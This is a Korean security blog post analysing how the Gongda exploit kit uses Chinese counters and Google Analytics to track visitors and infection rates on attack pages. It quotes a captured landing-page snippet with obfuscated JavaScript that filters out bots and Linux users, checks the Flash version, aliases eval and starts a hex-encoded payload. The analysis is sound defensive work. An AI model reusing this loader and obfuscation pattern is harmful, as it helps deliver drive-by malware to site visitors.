트래픽 통계수집은 통계를 통한 잠재고객의 유치 및 접근자에 맞는 서비스 제공등에 목적을 두고 있습니다. 그래서 대형 검색 사이트(구글, 야후, 얀덱스, 바이두 등)에서는 무료로 트래픽 통계수집 서비스를 제공하고 있습니다. (Google Analytics, ...)
공격자는 트래픽 길목에 유동인구수가 얼만큼 되는지, 자신의 공격 페이지에 접근한 사용자는 몇이고, 악성코드 감염된 수치와 비교하여 접근하였지만 감염되지 않은 수가 얼마인지 등 다양한 정보를 수집합니다.
일반적으로 국내 웹을 이용한 공격의 대부분은 공다팩 입니다. 공다팩은 레드킷이나 블랙홀과 다르게 랜더링 페이지가 없으며, 랜더링 페이지가 없다는 말은 곧 자체적으로 통계수집를 하지 못한다는 것을 의미합니다. 그래서 공다팩은 51yes, cnzz과 같은 중국 통계수집 스크립트를 사용합니다.
최근 보고 있는 공다팩들은 Google Analytics를 사용하는 것으로 보고 있습니다.
<script language="javascript" src="http://count20.51yes.com/click.aspx?id=205345377&logo
=1" charset="gb2312"></script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-41471710-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') +
'.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script type="text/javascript" src="swfobject.js">
<script src=jpg.js>
<script type="text/javascript">
var NGktY2=navigator.userAgent.toLowerCase();
var iAvM5="1"+"1"+"1";
if(document.cookie.indexOf("HFhPdwu0=")==-1 && NGktY2.indexOf("linux")<=-1 &&
NGktY2.indexOf("bot")==-1 && NGktY2.indexOf("spider")==-1)
{
var ddgPgdP0=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
iAvM5="0"+"0";
document.cookie="HFhPdwu0=Yes;path=/;expires="+expires.toGMTString();
dlbAn1="1"+"1";delete dlbAn1;try{dlbAn1+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";}
catch(e){var lwJfvd7="1";bYea5 = eval}yzzF6=unescape;LMWiR0="0CFD5A0B1FCD025A09FB6E27088A6
C5D4FBF292B3B9D3F4041B43C15FA977F57B6E660B3B8EE64BFA5E52EE3F98E38A7E38F0FF7F79D4BF4F0811A
FEC4DB16E2C09912D6C59F1BD382890BC2C467558D8864F38D9A23BEBAB678E8C9E075E2D1A077F5BAF57EFAA
4B973FCA5A40CFEBDB147D5B69D46C0BAB940DDF3C750C2BB9D1198D8E530D1888................
이런 변화는 분석하는 사람의 입장에서 트래픽 통계의 오용에 대한 판단 기준의 모호함을 느끼게 됩니다.
때때로 공격자는 악성코드를 유포하다가 트래픽의 량과 접속자의 정보만 수집하기 위해 트래픽 통계 스크립트만 이용하여 정보를 수집합니다. 정상적인 국내 사이트에 51yes, cnzz, lienzing, 51.la와 같은 중국에서 서비스를 제공하는 통계를 사용할 리는 없습니다. 서비스 제공 언어가 중국어 인데 국내 관리자가 이런 통계서비스를 이용할 리 없는 것이죠.
즉, 공격자는 정보 수집을 하고 있다고 볼 수 있습니다. 하지만 구글의 서비스를 이용한다는건 넓은 백사장에서 튀어나온 한조각의 날카로운 유리조각과 같다고 생각합니다. 수많은 정상적인 사용에서 악의적인 의도를 판단 할 수가 없게됩니다.
'Information Security > Malware' 카테고리의 다른 글
| Vbscript Obfuscated (2) | 2013.06.19 |
|---|---|
| Kaixin Exploit Tookit(Yszz 0.13) (2) | 2013.06.13 |
| Hexdecimal Obfuscation #01 (0) | 2013.06.10 |
| Split Obfuscated (0) | 2013.06.07 |
| JSMin Javascript Compressor (0) | 2013.06.07 |
